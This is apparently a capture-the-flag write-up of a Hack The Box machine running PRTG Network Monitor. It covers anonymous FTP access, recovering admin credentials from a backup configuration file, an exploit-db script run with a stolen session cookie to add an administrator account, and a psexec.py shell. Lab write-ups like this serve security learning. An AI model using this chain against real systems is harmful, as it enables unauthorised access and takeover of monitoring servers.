As usual, I started with an nmap scan. There were a lot of open ports, but what immediately caught my eye was the FTP server. From the screenshot above, you can see that the Anonymous FTP login was allowed, and it appeared that the C drive directory accessible, which I could potentially get a lot of important information from.
As expected, I was able to obtain the user flag immediately after accessing the FTP server.
Got the user flag.
I navigated to the web page of the target address and it’s titled PRTG Network Monitor.
I googled “PRTG Network Monitor default credentials” and found the credentials above, prtgadmin:prtgadmin. However, they did not work.
Also googled “PRTG Network Monitor exploit” and found the exploit above. But as you can see, it requires authenticated meaning I had to find the password first in order to run the exploit.
While I was researching about the PRTG Network Monitor I found an interesting information about where it stores its data. The path of the default data folder is the following: %programdata%\Paessler\PRTG Network Monitor.
I cd into the location path as learned and I found 3 PRTG Configuration files. Downloaded all of the 3 files using the command get.
The command md5sum returned that the hash of the first two files are identical meaning the contents inside those files are exactly the same. So I just needed to check either of the files and the PRTG Configuration.old.bak file.
Inside the first file I checked, the password was encrypted.
Inside the PRTG Configuration.old.bak file, I found the credentials.
Username: prtgadmin, Password: PrTg@dmin2018
Navigated back to the webpage to confirm if the credentials that I obtained actually work, and they did.
Under the exploit-db page that I found earlier, there was this piece of information that instructed me to obtain the cookie info use it with the script and it will create a new user ‘pentest’ in the administrators group with the password ‘P3nT3st!’.
I powered on the burpsuite to intercept the traffic and get the cookie information.
./prtg-exploit.sh -u http://10.10.10.152 -c "_ga=GA1.4.620613745.1723521193; _gid=GA1.4.536926311.1723521193; OCTOPUS1813713946=ezYyRkZGRkIyLTg4MTYtNEU1NC1BQ0U3LTQ1MjdCRUY1QzI1QX0%3D; _gat=1"
Once I grabbed the cookie information, I replaced the placeholder and ran the above script.
The exploit successfully created new user ‘pentest’ with password ‘P3nT3st!’ just as expected!
I could have used the msfconsole for getting the shell but I wanted to practice another way around and I learned about Impacket. It is a collection of Python classes for working with network protocols and of course used by pentesters.
Installed the impacket-scripts to use psexec.py file. The psexec.py is often used during penestration tests to gain remote command execution on target systems once valid credentials are obtained. It can also help in lateral movement within a network by allowing attackers to execute commands on multiple machines using stolen or cracked credentials.
psexec.py script with the obtained credentials got me the root administrator shell.
Got the root flag!
